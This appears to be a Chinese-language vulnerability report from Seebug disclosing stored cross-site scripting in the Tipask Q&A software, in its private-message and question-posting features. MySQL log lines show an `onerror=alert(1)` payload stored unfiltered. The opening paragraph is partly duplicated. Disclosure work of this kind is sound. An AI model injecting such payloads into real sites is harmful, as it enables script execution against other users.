### 简要描述: 存在两处 ### 详细说明: ### 下载了一个tipask测试 ### 漏洞证明: # 站内信发送, 抓包 [<img src="https://images.seebug.org/upload/201412/211930174e71a21f616f598090f309e1a26e6440.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/211930174e71a21f616f598090f309e1a26e6440.jpg) ### mysql日志显示 [<img src="https://images.seebug.org/upload/201412/2119305774175ee65a78671371179bc3596d1e78.jpg" alt="xss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2119305774175ee65a78671371179bc3596d1e78.jpg) [<img src="https://images.seebug.org/upload/201412/21193139327f83e2860926c68602decb1d4b453a.jpg" alt="alert(1).jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/21193139327f83e2860926c68602decb1d4b453a.jpg) #######完整的。。。。 后面是没有过滤 INSERT INTO ask_message SET `from`='abc' , `fromuid`=3 , `touid`=2 , `subject`='aaaaaaaaaaaaaaaaaaa\"><img src=# onerror=alert(1)>' ,...
### 简要描述: 存在两处 ### 详细说明: ### 下载了一个tipask测试 ### 漏洞证明: # 站内信发送, 抓包 [<img src="https://images.seebug.org/upload/201412/211930174e71a21f616f598090f309e1a26e6440.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/211930174e71a21f616f598090f309e1a26e6440.jpg) ### mysql日志显示 [<img src="https://images.seebug.org/upload/201412/2119305774175ee65a78671371179bc3596d1e78.jpg" alt="xss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2119305774175ee65a78671371179bc3596d1e78.jpg) [<img src="https://images.seebug.org/upload/201412/21193139327f83e2860926c68602decb1d4b453a.jpg" alt="alert(1).jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/21193139327f83e2860926c68602decb1d4b453a.jpg) #######完整的。。。。 后面是没有过滤 INSERT INTO ask_message SET `from`='abc' , `fromuid`=3 , `touid`=2 , `subject`='aaaaaaaaaaaaaaaaaaa\"><img src=# onerror=alert(1)>' , `time`=1419138527 , `content`='<p><img src=\"http://a.cn/tipask/data/attach/1412/Ti7fgWSO.jpg\"><img src=# onerror=alert(1)>\" title=\"1.jpg\"/></p>' [<img src="https://images.seebug.org/upload/201412/2119321088d2e6063125b1b43860b2c7d3490f2a.jpg" alt="shuchu.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2119321088d2e6063125b1b43860b2c7d3490f2a.jpg) ## 第二处 ,发表提问也存在 [<img src="https://images.seebug.org/upload/201412/2119325635d4f51d474b5524976c0f515394aceb.jpg" alt="11100.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2119325635d4f51d474b5524976c0f515394aceb.jpg) 484 Query INSERT INTO ask_message SET `from`='test' , `fromuid`=2 , `touid`=1 , `subject`='闂姹傚姪:aaaaaaaaaaaaaaaaaaaaaaaaaaa' , `time`=1419139963 , `content`='<p><img src=\"http://a.cn/tipask/data/attach/1412/7qjjaFzh.jpg\" title=\"1.jpg\"/></p>\"><img src=# onerror=alert(1)><br /> <a href="http://a.cn/tipask/?q-3.html">鐐瑰嚮鏌ョ湅闂</a>' [<img src="https://images.seebug.org/upload/201412/211933110a19d8bb65b614e6a352d9c7a657669b.jpg" alt="12.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/211933110a19d8bb65b614e6a352d9c7a657669b.jpg)
